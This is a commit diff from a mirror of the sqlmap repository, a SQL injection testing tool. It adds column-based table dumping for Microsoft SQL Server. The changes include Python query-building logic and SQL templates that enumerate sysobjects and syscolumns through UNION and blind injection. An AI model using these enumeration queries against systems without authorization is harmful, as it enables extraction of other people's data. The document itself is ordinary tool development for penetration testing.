sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-10-31 07:57:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

Added support for --dump with -C also on MSSQL

Browse Source
This commit is contained in:
Bernardo Damele 2010-01-10 19:12:54 +00:00
parent e5dc3f51c8
commit 80bd146696
3 changed files with 45 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
plugins/dbms/mssqlserver.py
View File

@ -392,11 +392,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeov
return kb.data.cachedTables return kb.data.cachedTables
def dumpColumn(self):
errMsg = "Table(s) dump by providing only -C is not "
errMsg += "yet implemented for Microsoft SQL Server"
raise sqlmapUnsupportedFeatureException, errMsg
def unionReadFile(self, rFile): def unionReadFile(self, rFile):
errMsg = "Microsoft SQL Server does not support file reading " errMsg = "Microsoft SQL Server does not support file reading "
errMsg += "with UNION query SQL injection technique" errMsg += "with UNION query SQL injection technique"

65
plugins/generic/enumeration.py
View File

@ -960,15 +960,18 @@ class Enumeration:
errMsg = "invalid value" errMsg = "invalid value"
raise sqlmapNoneDataException, errMsg raise sqlmapNoneDataException, errMsg
if kb.dbms == "Microsoft SQL Server":
plusOne = True
else:
plusOne = False
for column in colList: for column in colList:
if kb.dbms == "Oracle": if kb.dbms == "Oracle":
column = column.upper() column = column.upper()
conf.db = "USERS" conf.db = "USERS"
elif kb.dbms == "Microsoft SQL Server":
if not conf.db:
if not len(kb.data.cachedDbs):
enumDbs = self.getDbs()
else:
enumDbs = kb.data.cachedDbs
conf.db = ",".join(db for db in enumDbs)
foundCols[column] = {} foundCols[column] = {}
@ -1053,11 +1056,16 @@ class Enumeration:
if kb.unionPosition: if kb.unionPosition:
query = rootQuery["inband"]["query2"] query = rootQuery["inband"]["query2"]
if kb.dbms == "Oracle":
query += " WHERE %s" % colQuery if kb.dbms in ( "MySQL", "PostgreSQL" ):
else:
query = query % db query = query % db
query += " AND %s" % colQuery query += " AND %s" % colQuery
elif kb.dbms == "Oracle":
query += " WHERE %s" % colQuery
elif kb.dbms == "Microsoft SQL Server":
query = query % (db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
values = inject.getValue(query, blind=False) values = inject.getValue(query, blind=False)
if values: if values:
@ -1078,18 +1086,23 @@ class Enumeration:
logger.info(infoMsg) logger.info(infoMsg)
query = rootQuery["blind"]["count2"] query = rootQuery["blind"]["count2"]
if kb.dbms == "Oracle":
query += " WHERE %s" % colQuery if kb.dbms in ( "MySQL", "PostgreSQL" ):
else:
query = query % db query = query % db
query += " AND %s" % colQuery query += " AND %s" % colQuery
elif kb.dbms == "Oracle":
query += " WHERE %s" % colQuery
elif kb.dbms == "Microsoft SQL Server":
query = query % (db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
count = inject.getValue(query, inband=False, expected="int", charsetType=2) count = inject.getValue(query, inband=False, expected="int", charsetType=2)
if not count.isdigit() or not len(count) or count == "0": if not count.isdigit() or not len(count) or count == "0":
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
if colConsider == "1": if colConsider == "1":
warnMsg += "s like" warnMsg += "s like"
warnMsg += " '%s'" % column warnMsg += " '%s' " % column
warnMsg += "in database '%s'" % db warnMsg += "in database '%s'" % db
logger.warn(warnMsg) logger.warn(warnMsg)
@ -1099,12 +1112,20 @@ class Enumeration:
for index in indexRange: for index in indexRange:
query = rootQuery["blind"]["query2"] query = rootQuery["blind"]["query2"]
if kb.dbms == "Oracle":
query += " WHERE %s" % colQuery if kb.dbms in ( "MySQL", "PostgreSQL" ):
else:
query = query % db query = query % db
query += " AND %s" % colQuery query += " AND %s" % colQuery
query = agent.limitQuery(index, query) field = None
elif kb.dbms == "Oracle":
query += " WHERE %s" % colQuery
field = None
elif kb.dbms == "Microsoft SQL Server":
query = query % (db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
field = colCond.replace("[DB]", db)
query = agent.limitQuery(index, query, field)
tbl = inject.getValue(query, inband=False) tbl = inject.getValue(query, inband=False)
if tbl not in dbs[db]: if tbl not in dbs[db]:
@ -1154,23 +1175,22 @@ class Enumeration:
dumpFromDbs = [] dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n" message = "which database(s)?\n[a]ll (default)\n"
for db in dbs: for db, tblData in dbs.items():
message += "[%s]\n" % db if tblData:
message += "[%s]\n" % db
message += "[q]uit" message += "[q]uit"
test = readInput(message, default="a") test = readInput(message, default="a")
if not test or test in ("a", "A"): if not test or test in ("a", "A"):
dumpFromDbs = dbs.keys() dumpFromDbs = dbs.keys()
elif test in ("q", "Q"): elif test in ("q", "Q"):
return return
else: else:
dumpFromDbs = test.replace(" ", "").split(",") dumpFromDbs = test.replace(" ", "").split(",")
for db, tblData in dbs.items(): for db, tblData in dbs.items():
if db not in dumpFromDbs: if db not in dumpFromDbs or not tblData:
continue continue
conf.db = db conf.db = db
@ -1187,13 +1207,10 @@ class Enumeration:
if not test or test in ("a", "A"): if not test or test in ("a", "A"):
dumpFromTbls = tblData dumpFromTbls = tblData
elif test in ("s", "S"): elif test in ("s", "S"):
continue continue
elif test in ("q", "Q"): elif test in ("q", "Q"):
return return
else: else:
dumpFromTbls = test.replace(" ", "").split(",") dumpFromTbls = test.replace(" ", "").split(",")

5
xml/queries.xml
View File

@ -226,7 +226,10 @@
<inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/> <inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>
<blind query="SELECT %s..syscolumns.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')" condition="[DB]..syscolumns.name"/> <blind query="SELECT %s..syscolumns.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')" condition="[DB]..syscolumns.name"/>
</columns> </columns>
<dump_column/> <dump_column>
<inband query="" query2="SELECT %s..sysobjects.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" condition="[DB]..syscolumns.name"/>
<blind query="" query2="SELECT %s..sysobjects.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" count="" count2="SELECT COUNT(%s..sysobjects.name) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id" condition="[DB]..syscolumns.name"/>
</dump_column>
<dump_table> <dump_table>
<inband query="SELECT %s FROM %s..%s"/> <inband query="SELECT %s FROM %s..%s"/>
<blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/> <blind query="SELECT TOP 1 %s FROM %s..%s WHERE %s NOT IN (SELECT TOP %d %s FROM %s..%s)" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>